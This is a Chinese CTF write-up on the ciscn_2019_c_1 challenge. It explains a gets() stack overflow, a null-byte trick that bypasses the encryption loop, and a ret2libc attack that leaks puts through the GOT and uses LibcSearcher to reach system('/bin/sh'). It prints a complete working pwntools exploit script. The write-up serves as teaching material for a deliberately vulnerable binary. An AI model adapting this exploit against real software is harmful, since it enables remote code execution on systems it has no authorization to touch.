当前位置: 首页 > news >正文

PWN手的成长之路-14-ciscn_2019_c_1-ret2libc

查看 main 函数:

image

image

image

再结合程序的运行,我们输入的值存到了 v4 中,当 v4=2 时,程序重新再次执行 begin() 函数,若输入 3,则直接退出程序,只有当我们输入 1 的时候,程序才会调用 encrypt() 函数。

查看 encrypt() 函数。gets() 读取输入并进入循环,通过 strlen(s) 获取用户输入的字节长度并对字符进行一系列异或操作。

image

发现存在 gets() 高危函数,猜测存在栈溢出漏洞。但是这道题没有 system("/bin/sh"),并且文件开启了 NX 保护,因此 ret2shellcode、ret2text基本排除了,所以只能是 ret2libc。

ret2libc 是不直接注入 shellcode (因为程序通常具有 NX 保护,栈不可知执行),而是通过利用程序自身加载的动态链接库(比如 libc.so)中的函数(如 system()、execve()等)来执行任意的代码。

但是这道题并没有给出 libc.so 文件,并且程序自身也没有 system 函数和 "/bin/sh" 字符串,所以就需要先泄露程序中的函数地址,再查询 libc 版本,并找到 system 函数和 "/bin/sh" 字符串的内存地址。

再分析 encrypt() 函数,strlen 函数是一个C库中的函数,主要用于计算以空字符 “\0”

为结尾的字符串长度,它会从传入的字符串开始检查每一个字符,直到遇到 “\0” 为止,然后返回遇到的字符串个数(其中不包括 "\0" 本身),例如:给定字符串 “hello”,strlen 函数会返回5,但是如果在字符串开头加上 "\0",那么此时 strlen 函数就会返回0,例如:输入字符串 "\0hello",strlen 函数就会返回0,因为 strlen 函数的机制就是遇到 "\0" 就停止计数,在 encrypt() 函数的后续有说明当 v0>= strlen(s),但是由于 strlen 返回的就是0,所以 v0>=strlen(s) 为假,条件不成立则跳出循环,即跳过了 encrypt 函数对字符串进行异或操作的逻辑,以达到 “破坏” 加密流程的目的(目的就是不让他进行加密操作)。

因为函数没有 system 、/bin/sh,所以攻击会变得较为复杂步骤:

1、泄露libc函数地址(puts)

2、计算其他libc函数地址(system)

3、构造ROP链(/bin/sh)

具体流程:先泄露 puts 函数 plt,再泄露 puts 函数 got 表,栈溢出覆盖返回地址,控制流程使其跳转到 puts@plt,设置 put 参数的内存地址为 got(即泄露 puts 在内存中的实际地址),再返回 main 函数,为什么是 main 函数,因为需要返回到可以再次触发漏洞的攻击函数,方便二次攻击。

再得到puts的真实地址后,使用得到puts地址并结合ibc数据库匹配相对应的libc版本,再计算其他函数的偏移地址。

最终exp(调试了快两天才最终于2025/10/12/14:40成功):

from pwn import *

from LibcSearcher import *

#start

r = remote('node5.buuoj.cn',28626)

#r = process('./pwn')

elf = ELF('./pwn')

#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') #ldd pwn

context.log_level='debug'

#params

rdi_addr = 0x400C83

ret_addr = 0x4006b9

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

main_addr = elf.sym['main']

#attack

payload = b'a'*(0x50 + 8) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

r.sendlineafter(b"choice",b'1')

r.sendline(payload)

puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

#puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))

print(hex(puts_addr))

#libc

libc = LibcSearcher("puts",puts_addr)

base_addr = puts_addr - libc.dump('puts')

system_addr = base_addr + libc.dump('system')

bin_sh_addr = base_addr + libc.dump('str_bin_sh')

#base_addr = puts_addr - libc.symbols['puts']

#system_addr = base_addr + libc.symbols['system']

#bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2

payload2 = b'a'*(0x50+8) + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) +p64(system_addr)

r.sendlineafter(b'choice',b'1')

r.recvuntil(b'encrypted')

r.sendline(payload2)

r.interactive()

参考1000x_师傅的文章。

http://www.cnnetsun.cn/news/14872.html

相关文章:

  • PHP 15 个高效开发的小技巧
  • 三级防护+119种语言:Qwen3Guard-Gen重新定义2025大模型安全标准
  • Brotli解压引擎深度解密:从位流到字节的魔法转换
  • 深度解析 MySQL 与 MCP 集成:从环境构建到 AI 驱动的数据交互全流程
  • 5个理由选择Google Assistant SDK Python版打造智能语音设备
  • 卷心菜矮砧密植:水肥一体化系统的详细铺设要点
  • Automa模板市场:让每个用户都能安全享受社区智慧
  • Citra模拟器完整教程:3步在电脑畅玩3DS游戏
  • Step-Audio 2 mini:2025开源语音模型如何重塑企业交互新范式
  • 13、BPF 流量控制分类器详解
  • 14、快速数据路径(XDP):原理、模式与应用指南
  • 3步搞定Snap.svg动画导出:从SVG到视频GIF的完整指南
  • Java ArrayList扩容机制深度解析
  • 手把手教你Windows系统安装pgvector:PostgreSQL向量搜索实战指南
  • xtb量子化学计算终极实战指南:从新手到专家的完整路径
  • Windows权限维持技术攻击手法与深度防御浅析
  • Windows系统映像劫持:网络安全中的“李代桃僵”战术
  • 几内亚硬建钢铁厂?中方点破 5 大短板!最致命问题中国一眼看穿!
  • Navicat重置工具完整指南:轻松解决试用期限制
  • 19、Linux 新软件安装全攻略
  • 使用STM32单片机进行串口通信的过程描述
  • JetBrains Maple Mono字体深度体验与配置指南
  • 【Java毕设源码分享】基于springboot+vue的个人博客系统的设计与实现(程序+文档+代码讲解+一条龙定制)
  • PaddleSpeech模型版本管理终极指南:从混乱到秩序
  • 闪电AI文档转换Lite:离线免费的全能文档处理神器
  • Windows系统pgvector一键部署攻略:告别编译烦恼,轻松开启向量搜索
  • 伊朗地毯数据集,波斯地毯Lechak-Toranj和Afshan图案分类,计算机视觉机器学习训练,纺织设计分析增强样本,装饰艺术特征提取对称检测算法,纹理分析Gabor滤波,个性化定制图案生成
  • [基础算法学习]backtrack回溯法(三):从N皇后、解数独带你掌握棋盘回溯问题
  • 终极指南:如何从零开始掌握Lean数学库mathlib?完整教程助你快速入门
  • Go之路 - 7.go的函数